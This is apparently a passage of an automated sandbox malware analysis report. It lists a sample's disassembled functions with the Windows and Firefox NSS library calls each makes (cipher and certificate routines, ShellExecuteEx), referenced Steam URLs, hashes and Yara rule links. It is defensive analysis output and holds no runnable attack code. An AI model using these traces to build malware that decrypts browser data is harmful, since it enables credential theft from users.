                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 287051776-0
                                                                                                                                                                                          • Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                                                                                                                          • Instruction ID: 1b4ff73158874a5d4cd6ee04e215bfc30890365a45305653334b3d4564c3ffce
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                                                                                                                          • Instruction Fuzzy Hash: 63310771501160A7F714C655CC8AFBFB265EF80318FE4CA7AD42DD7AD1EB319886CA21
                                                                                                                                                                                          Function 6C46DC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C46DC60
                                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C46D38A,?), ref: 6C46DC6F
                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,6C46D38A,?), ref: 6C46DCC1
                                                                                                                                                                                          • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C46D38A,?), ref: 6C46DCE9
                                                                                                                                                                                          • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C46D38A,?), ref: 6C46DD05
                                                                                                                                                                                          • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C46D38A,?), ref: 6C46DD4A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1842996449-0
                                                                                                                                                                                          • Opcode ID: b0e6608cf544d579d847cdd124673083fd57c16eecc482bb9fb8ff6e50b81304
                                                                                                                                                                                          • Instruction ID: 412c7fac4f44793d0eb9241197e322b9ace5898d2d501ab8e715c73a2fcc27ad
                                                                                                                                                                                          • Opcode Fuzzy Hash: b0e6608cf544d579d847cdd124673083fd57c16eecc482bb9fb8ff6e50b81304
                                                                                                                                                                                          • Instruction Fuzzy Hash: 204147B5A006159FCB10DF9AC880D9AB7B6FF89318B654569D945ABB14DB31EC00CB90
                                                                                                                                                                                          Function 6C530E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CERT_DecodeAVAValue.NSS3(?,?,6C530A2C), ref: 6C530E0F
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C530A2C), ref: 6C530E73
                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C530A2C), ref: 6C530E85
                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(00000001,?,?,6C530A2C), ref: 6C530E90
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C530EC4
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C530A2C), ref: 6C530ED9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3618544408-0
                                                                                                                                                                                          • Opcode ID: d5895b782b6293a5c52747b3549a65ebe232aa8118d594d1432b311b64eda51c
                                                                                                                                                                                          • Instruction ID: 98648bdeb27fc36551ff7798533dceed40081b97108be9c363ef7885cb7aadd8
                                                                                                                                                                                          • Opcode Fuzzy Hash: d5895b782b6293a5c52747b3549a65ebe232aa8118d594d1432b311b64eda51c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 46213E76F003B49BEB00956A9C85B6B73AEDBC1749F195437D81C63BC2FA60CC1592A1
                                                                                                                                                                                          Function 6C53AE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C53AEB3
                                                                                                                                                                                          • SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C53AECA
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C53AEDD
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE022,00000000), ref: 6C53AF02
                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C659500), ref: 6C53AF23
                                                                                                                                                                                            • Part of subcall function 6C58F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C58F0C8
                                                                                                                                                                                            • Part of subcall function 6C58F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C58F122
                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C53AF37
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3714604333-0
                                                                                                                                                                                          • Opcode ID: b1a896b14f786cc031f207b64e4243cf0b0b1b175809f578ccee29410e02823e
                                                                                                                                                                                          • Instruction ID: f1830206acedef12e417b97cf4c3f7f6ec482e6d6bad8d5994e4d97100b212a0
                                                                                                                                                                                          • Opcode Fuzzy Hash: b1a896b14f786cc031f207b64e4243cf0b0b1b175809f578ccee29410e02823e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 432157B6909210ABEF008E588C01B9A7BA4AFC532CF144718FC589B7C0F731D90487A7
                                                                                                                                                                                          Function 6C5BEE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5BEE85
                                                                                                                                                                                          • realloc.MOZGLUE(13326EFB,?), ref: 6C5BEEAE
                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6C5BEEC5
                                                                                                                                                                                            • Part of subcall function 6C590BE0: malloc.MOZGLUE(6C588D2D,?,00000000,?), ref: 6C590BF8
                                                                                                                                                                                            • Part of subcall function 6C590BE0: TlsGetValue.KERNEL32(6C588D2D,?,00000000,?), ref: 6C590C15
                                                                                                                                                                                          • htonl.WSOCK32(?), ref: 6C5BEEE3
                                                                                                                                                                                          • htonl.WSOCK32(00000000,?), ref: 6C5BEEED
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C5BEF01
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1351805024-0
                                                                                                                                                                                          • Opcode ID: aa1011b098f7796886743f4c120d13109f71836c15b04036dc887389edd8e0ca
                                                                                                                                                                                          • Instruction ID: ca22701c58f57bcb5f6ccea372c4733a65d3084a1a6ab498d0b20349a3c90614
                                                                                                                                                                                          • Opcode Fuzzy Hash: aa1011b098f7796886743f4c120d13109f71836c15b04036dc887389edd8e0ca
                                                                                                                                                                                          • Instruction Fuzzy Hash: B0219471A002149BDB10DF28DC9075ABBA4EF45358F1981A9EC19AB741E770EC14CBE6
                                                                                                                                                                                          Function 6C56EE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C56EE49
                                                                                                                                                                                            • Part of subcall function 6C58FAB0: free.MOZGLUE(?,-00000001,?,?,6C52F673,00000000,00000000), ref: 6C58FAC7
                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C56EE5C
                                                                                                                                                                                          • PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6C56EE77
                                                                                                                                                                                          • PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6C56EE9D
                                                                                                                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C56EEB3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 886189093-0
                                                                                                                                                                                          • Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
                                                                                                                                                                                          • Instruction ID: 70e3fe9c1a278368ca868ebca842ce2ee4724ce55cf30e416559af6e39c7d720
                                                                                                                                                                                          • Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
                                                                                                                                                                                          • Instruction Fuzzy Hash: DD21D5B6A01210ABEB118E59DC81EAB77A8EF49718F0501A4FD04AB751E7B1EC14C7F1
                                                                                                                                                                                          Function 6C46CCF0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 299COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C45DA31,m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity,?,?,00000000,?), ref: 6C46CDA4
                                                                                                                                                                                            • Part of subcall function 6C42CA10: malloc.MOZGLUE(?), ref: 6C42CA26
                                                                                                                                                                                            • Part of subcall function 6C46D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity,?,6C46CDBA,m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity,?,00000000,?,6C45DA31,m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity,?,?,00000000,?), ref: 6C46D158
                                                                                                                                                                                            • Part of subcall function 6C46D130: InitializeConditionVariable.KERNEL32(00000098,?,6C46CDBA,m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity,?,00000000,?,6C45DA31,m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity,?,?,00000000,?), ref: 6C46D177
                                                                                                                                                                                          • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C45DA31,m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity,?,?,00000000,?), ref: 6C46CDC4
                                                                                                                                                                                            • Part of subcall function 6C467480: ReleaseSRWLockExclusive.KERNEL32(?,6C4715FC,?,?,?,?,6C4715FC,?), ref: 6C4674EB
                                                                                                                                                                                          • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C45DA31,m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity,?,?,00000000,?), ref: 6C46CECC
                                                                                                                                                                                            • Part of subcall function 6C42CA10: mozalloc_abort.MOZGLUE(?), ref: 6C42CAA2
                                                                                                                                                                                            • Part of subcall function 6C45CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C46CEEA,?,?,?,?,00000000,?,6C45DA31,m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity,?,?,00000000), ref: 6C45CB57
                                                                                                                                                                                            • Part of subcall function 6C45CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C45CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C46CEEA,?,?), ref: 6C45CBAF
                                                                                                                                                                                          • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C45DA31,m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity,?,?,00000000,?), ref: 6C46D058
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity, xrefs: 6C46CCF4, 6C46CD6C, 6C46CDB4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                                                                                                                          • String ID: m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity
                                                                                                                                                                                          • API String ID: 861561044-1856350843
                                                                                                                                                                                          • Opcode ID: bdf2b4cf721bf3a0fcd47efaa21cc45cbe896e4c17265868847a8d4b0a53c2a4
                                                                                                                                                                                          • Instruction ID: 345eaf93b45b6de837c618210fc03283383e946df14e88126b541655bb4815df
                                                                                                                                                                                          • Opcode Fuzzy Hash: bdf2b4cf721bf3a0fcd47efaa21cc45cbe896e4c17265868847a8d4b0a53c2a4
                                                                                                                                                                                          • Instruction Fuzzy Hash: D8D17D71A04B069FD708CF29C480F99B7F1BF99308F11862DE85987B56EB31A965CBC1
                                                                                                                                                                                          Function 0003210E Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 36stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • StrStrA.SHLWAPI(?,00000000,?,?,?,00033794,00000000,00000010), ref: 00032119
                                                                                                                                                                                          • lstrcpynA.KERNEL32(C:\Users\user\Desktop\,?,00000000,?), ref: 00032132
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00032144
                                                                                                                                                                                          • wsprintfA.USER32 ref: 00032156
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                                          • String ID: %s%s$C:\Users\user\Desktop\
                                                                                                                                                                                          • API String ID: 1206339513-438050915
                                                                                                                                                                                          • Opcode ID: f6a4dbba339eb86ecf99d12b48804dde3d9876007bc83bf254d9bf6d9b1ba314
                                                                                                                                                                                          • Instruction ID: 0e1ef2b1eebb3e0affb26d3006ea7387d5271336b2656e0cddee3977c79e8e63
                                                                                                                                                                                          • Opcode Fuzzy Hash: f6a4dbba339eb86ecf99d12b48804dde3d9876007bc83bf254d9bf6d9b1ba314
                                                                                                                                                                                          • Instruction Fuzzy Hash: 84F0E932200119BFDF111F59EC4CD6BBFACEF59665B0600A0FA0C97211C7715D5586F1
                                                                                                                                                                                          Function 6C51AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C51AFDA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C51AFC4
                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C51AFD3
                                                                                                                                                                                          • unable to delete/modify collation sequence due to active statements, xrefs: 6C51AF5C
                                                                                                                                                                                          • misuse, xrefs: 6C51AFCE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
                                                                                                                                                                                          • API String ID: 632333372-924978290
                                                                                                                                                                                          • Opcode ID: 725b2732384aa22ea0f8f918cc16d5e7a5e8a42bd8a9a451b22346c460b0aeed
                                                                                                                                                                                          • Instruction ID: 2f2fe58c22ac48b47e4185aface43628d1e5373df202afffd855a00e2141bc29
                                                                                                                                                                                          • Opcode Fuzzy Hash: 725b2732384aa22ea0f8f918cc16d5e7a5e8a42bd8a9a451b22346c460b0aeed
                                                                                                                                                                                          • Instruction Fuzzy Hash: BF91F5B5B082158FEB05CF59CC98BAAB7F1BF45314F1985A8E864ABB51D334EC05CB60
                                                                                                                                                                                          Function 00032962 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 182COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 00031C4A: GetSystemTime.KERNEL32(?,00056701,?), ref: 00031C79
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                          • ShellExecuteEx.SHELL32(?), ref: 00032B84
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
